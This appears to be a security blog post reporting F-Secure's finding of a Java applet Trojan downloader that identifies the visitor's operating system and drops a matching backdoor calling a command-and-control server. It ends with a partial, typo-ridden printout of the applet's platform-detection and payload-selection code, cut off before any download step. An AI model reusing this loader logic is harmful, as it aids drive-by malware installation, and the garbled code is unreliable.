A new Trojan downloader has been discovered which detects
your platform i.e. your operating system which you have and downloads the
corresponding malware for your platform.
Remember the cross-platform malware that exploited Java to
attack both PCs and Macs?
Here’s better one for you : A Trojan downloader that check
your operating system and then pick up the malware which is suitable for your
PCs/Macs.
The new Web-Based Social Engineering attacks, first detected
on the Columbia websites, relies on a malicious Java applet to install
backdoors on windows, Macs and Linux. When you first visit such a compromised
site, then that applet program checks which operating system you have (Windows,
Mac OS X, Linux) and then drops a corresponding Trojan for your platform.
F-Secure, which first found the Web exploit, detects the
initial malware as Trojan-Downloader: Java/GetShell.A. The respective playloads
for Windows, Mac, and Linux are detected
as follows:Backdoor:W32/GetShell.A, Backdoor:OSX/GetShell.A (PowerPC binary,
requires Rosetta on an Intel based platform), and Backdoor:Linux/GetShell.A .
All three of them have one purpose : to connect to a Command
and Control(C&C) server and await further instructions. These typically
include downloading additional malware and executing it. The security company
did note, however, that ever since it began monitoring this particular attack,
the C&C server hasn’t pushed any additional code.
It appears that the Trojan downloader was written using the
Social-Engineer Toolkit (SET), an open-source and publically-available Python
tool designed for penetration testing. It is very unlikely that this is a
penetration test. Malware writers love using a cross-platform plugin as an
attack vector because it allows them one operating system, and thus more
potential users. It shouldn’t surprise you that Java is being used: the
platform has loads of security holes and it runs on all the major operating
systems.
THIS IS THE CODE FOR THE TROJAN DOWNLOADER FOR ALL PLATFORM(This is an applet program)
public void init()
{
Try
{
Random localRandom=newRandom();
String
str1=Long.tostring(Math.abs(localRandom.nextLong()),36);
String
str2=System.getProperty(“java.io.tmpdir”)+File.seperator;
String str3=System.getProperty(“java.io.tmpdir”)+File.seperator;
String str4=System.getProperty(“OS.name”).toLowerCase();
String str5=System.getProperty(“OS.arch”);
String str6=” ”;
String str7=” ”;
String str8=” “;
String str9=” ”;
String str10=” ”;
int i=-1;
if (str4.indexOf(“WINDOWS”)>=0)
{
str6=getParameter(“WINDOWS”);
str7=getParameter(“STUFF”);
str8=getParameter(“64”);
str9=getParameter(“86”);
str10=getParameter(“ILIKEHUGS”);
i=0;
str2=str2+str1+”.exe”;
}
else if(str4.indexOf(“Mac”)>=0)
{
str6=getParameter(“OSX”);
i=1;
if(str2.startsWith(“/Var/folders/”))str2=”/tmp/”;
str2=str2+str1+”.bin”;
}
elseif((str4.indexOf(“nix”)>=0||(str4.indexOf(“nux”)>=0)
{
str6=getParameter(“Linux”);
i=2;
str2=str2+str1+”.bin”;
}
